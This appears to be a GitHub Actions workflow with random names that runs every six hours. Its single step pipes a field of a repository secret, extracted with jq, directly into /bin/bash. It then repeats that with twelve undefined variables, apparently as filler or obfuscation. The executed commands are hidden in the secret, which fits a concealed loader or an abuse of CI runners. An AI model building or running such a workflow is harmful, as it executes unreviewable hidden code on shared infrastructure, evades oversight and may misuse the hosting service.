name: zhoushilang4738
on:
  workflow_dispatch:
  schedule:
    - cron: '20 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhoushilang4738
        env:
          topv17055: ${{ secrets.topv17055 }}
        run: |
          echo $topv17055 | jq -r .xnhh960 | /bin/bash
          echo $hu3 | jq -r .axkc6589 | /bin/bash
          echo $bytk2 | jq -r .lq39 | /bin/bash
          echo $f14731 | jq -r .zu2172 | /bin/bash
          echo $s5 | jq -r .s19193 | /bin/bash
          echo $z939 | jq -r .sq6 | /bin/bash
          echo $bemv063 | jq -r .nait6141 | /bin/bash
          echo $h21602 | jq -r .y988 | /bin/bash
          echo $e361 | jq -r .tvi137 | /bin/bash
          echo $g5 | jq -r .cibl4 | /bin/bash
          echo $cno88 | jq -r .m9 | /bin/bash
          echo $apjp2 | jq -r .l17 | /bin/bash
          echo $sm82172 | jq -r .jo287 | /bin/bash

